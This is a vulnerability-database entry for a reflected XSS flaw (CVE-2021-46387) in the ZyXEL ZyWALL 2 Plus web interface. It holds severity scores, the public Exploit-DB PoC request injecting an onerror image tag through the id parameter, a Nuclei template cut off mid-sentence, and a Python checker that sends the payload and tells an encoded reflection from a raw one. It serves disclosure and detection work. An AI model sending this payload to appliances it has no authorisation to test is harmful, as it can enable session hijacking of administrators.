CVE-2021-46387
Published: 2022-03-01
Priority: P3 (47) · Severity: medium · CVSS 3.1 base score: 6.1
Vector: AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
Exploit: public PoC available
EPSS: 21.03% (97.3rd percentile)
ZyXEL ZyWALL 2 Plus Internet Security Appliance is affected by cross-site scripting (XSS). Insecure URI handling bypasses a security restriction and lets an attacker inject arbitrary JavaScript into the appliance's web interface (the public PoC does so through the id parameter of /Forms/rpAuth_1). Script running in a logged-in administrator's browser can be used for attacks such as clipboard hijacking and session hijacking, the latter against any session cookie not marked HttpOnly. Per the CVSS vector, the victim has to open an attacker-supplied link (UI:R); no authentication is needed to serve the payload (PR:N).
CVSS provenance
NVD, CVSS v3.1: 6.1 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
NVD, CVSS v2.0: 4.3 MEDIUM, AV:N/AC:M/Au:N/C:N/I:P/A:N
No detection rules found.
Exploit-DB
Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
exploitdb · 2022-03-02 · CVSS 6.1 · MEDIUM · CVE-2021-46387
---
# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Date: 1/3/2022
# Exploit Author: Momen Eldawakhly (CyberGuy)
# Vendor Homepage: https://www.zyxel.com
# Version: ZyWALL 2 Plus
# Tested on: Ubuntu Linux [Firefox]
# CVE : CVE-2021-46387
GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Nuclei
Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
nuclei · CVSS 6.1 · MEDIUM · CVE-2021-46387
ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.
Template:
id: CVE-2021-46387

info:
  name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.
  impact: |
    Successful exploitation of this vulnerability could
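The Exploit-DB request above and the Nuclei template both reduce to one check: does the value of the id parameter come back inside an HTML 200 page unencoded? The following Python script is an added example of that check, written for this page and not taken from the Exploit-DB entry or the Nuclei project. It percent-encodes the PoC payload exactly as the PoC does, parses a raw HTTP response, and applies a Nuclei-style matcher (status 200, text/html, the injected tag present verbatim). Because the appliance's real page layout is not shown here, `fake_appliance` is a constructed stand-in that echoes id into the login form, with the flawed reflection and the output-encoded fix side by side, so the script runs offline; port 8080 and the `prompt(1)` marker follow the PoC, and the hostname `vuln.ip` is a placeholder.

```python
"""Offline check for the CVE-2021-46387 reflection: does ?id= come back as raw HTML?"""
import html
import socket
from urllib.parse import parse_qs, quote, urlparse

PATH = "/Forms/rpAuth_1"
# Payload from the public PoC: close the surrounding <form>, inject an <img>
# whose onerror handler fires, then reopen a <form> so the page still parses.
# The mixed-case "iMg" is the PoC's way past a case-sensitive tag filter.
PAYLOAD = '</form><iMg src=x onerror="prompt(1)"><form>'
# What the matcher looks for after lower-casing the response body.
MARKER = '<img src=x onerror="prompt(1)">'


def build_request(host: str, port: int = 8080) -> str:
    """Raw HTTP/1.1 request, percent-encoded exactly like the PoC (port 8080 as in the PoC)."""
    query = quote(PAYLOAD, safe="/()=")
    return (
        f"GET {PATH}?id={query} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Connection: close\r\n\r\n"
    )


def parse_response(raw: bytes) -> tuple[int, str, str]:
    """Split a raw HTTP response into (status code, Content-Type, body text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])
    content_type = ""
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-type":
            content_type = value.strip()
    return status, content_type, body.decode("utf-8", "replace")


def is_vulnerable(status: int, content_type: str, body: str) -> bool:
    """Vulnerable when the injected tag is echoed verbatim inside an HTML 200 page.
    An output-encoded reflection (&lt;img ...) does not match, which is the point."""
    return status == 200 and "text/html" in content_type.lower() and MARKER in body.lower()


def check(host: str, transport) -> bool:
    """Run the probe through `transport(raw_request) -> raw_response` and decide."""
    return is_vulnerable(*parse_response(transport(build_request(host))))


def tcp_transport(host: str, port: int = 8080, timeout: float = 5.0):
    """Transport for a real target: plain TCP, as the PoC's unencrypted :8080 suggests."""
    def send(raw_request: str) -> bytes:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(raw_request.encode())
            chunks = []
            while chunk := sock.recv(4096):
                chunks.append(chunk)
        return b"".join(chunks)
    return send


# ---- constructed stand-in for the appliance so the check runs offline ----

def fake_appliance(raw_request: str, escape: bool) -> bytes:
    """Constructed model of rpAuth_1 (the real page layout is not known here):
    it echoes ?id= inside the login form. escape=False reproduces the flaw;
    escape=True is the fix, HTML-encoding the value before it reaches the page."""
    target = raw_request.split("\r\n", 1)[0].split()[1]
    id_value = parse_qs(urlparse(target).query).get("id", [""])[0]
    if escape:
        id_value = html.escape(id_value, quote=True)
    page = (
        "<html><body><form method=post action=/Forms/rpAuth_1>"
        f"Invalid request id: {id_value}"
        "</form></body></html>"
    )
    return ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n" + page).encode()


if __name__ == "__main__":
    # Offline demonstration; for a live host use check(host, tcp_transport(host)).
    print("flawed reflection :", check("vuln.ip", lambda r: fake_appliance(r, escape=False)))
    print("encoded reflection:", check("vuln.ip", lambda r: fake_appliance(r, escape=True)))
```

The matcher deliberately tests for the raw tag rather than for the word prompt: a device that reflects the value but entity-encodes it (the `escape=True` branch) still contains `prompt(1)` in the body, and a substring test on that alone would produce a false positive. Against a real appliance, confirm a hit in a browser as well, since a matcher cannot tell whether a Content-Security-Policy header or a frame context stops the handler from running.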
References:
http://packetstormsecurity.com/files/166189/Zyxel-ZyWALL-2-Plus-Cross-Site-Scripting.html
https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing
https://www.zyxel.com/uk/en/products_services/zywall_2_plus.shtml
https://www.zyxel.com/us/en/support/security_advisories.shtml